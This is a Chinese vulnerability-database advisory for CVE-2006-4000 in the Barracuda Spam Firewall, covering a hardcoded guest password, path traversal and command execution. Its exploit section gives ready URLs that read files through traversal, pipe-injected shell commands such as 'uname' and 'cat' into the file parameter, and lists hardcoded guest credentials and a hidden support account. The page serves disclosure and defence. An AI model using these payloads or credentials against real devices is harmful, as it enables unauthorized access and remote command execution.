Barracuda Networks垃圾邮件防火墙安全泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110723 漏洞类型 路径遍历
发布时间 2006-08-01 更新时间 2006-08-08
CVE编号 CVE-2006-4000 CNNVD-ID CNNVD-200608-066
漏洞平台 CGI CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/28321
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-066
|漏洞详情
BarracudaSpamFirewall是用于保护邮件服务器的集成硬件和软件垃圾邮件解决方案。Barracuda垃圾邮件防火墙Login.pm脚本中的guest帐号有硬编码的口令bnadmin99。尽管guest帐号仅有有限的访问能力,但还是可以获取以下信息:*系统配置,包括IP地址、管理员IPACL;*邮件消息日志(但没有消息的内容);*垃圾邮件/杀毒定义的版本信息和系统固件版本。Barracuda的preview_email.cgi脚本中还存在文件泄露漏洞。这个脚本用于从Barracuda的本地消息数据库检索消息,但没有正确的过滤通过GET传送的file参数以限制对消息数据库目录的文件检索,导致可以从Web界面访问任何WebServer用户可访问的文件。此外,利用管道符号(|)还可能执行任意命令。尽管这个脚本要求有效的用户登录,但结合上文所述的guest口令漏洞可以轻易的绕过这个限制。
|漏洞EXP
source: http://www.securityfocus.com/bid/19276/info

Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.

A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.

Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.

####################################################################
 
Proof of Concept:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`;
login: guest pass: phteam99

some folder are accessible via http without permission
https://<deviceIP>/Translators/
https://<deviceIP>/images/
https://<deviceIP>/locale
https://<deviceIP>/plugins
https://<deviceIP>/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
|参考资料

来源:BID
名称:19276
链接:http://www.securityfocus.com/bid/19276
来源:BUGTRAQ
名称:20060801BarracudaVulnerability:ArbitraryFileDisclosure[NNL-20060801-02]
链接:http://www.securityfocus.com/archive/1/archive/1/441861/100/0/threaded
来源:XF
名称:barracuda-previewemail-info-disclosure(28214)
链接:http://xforce.iss.net/xforce/xfdb/28214
来源:VUPEN
名称:ADV-2006-3104
链接:http://www.frsirt.com/english/advisories/2006/3104
来源:SECUNIA
名称:21258
链接:http://secunia.com/advisories/21258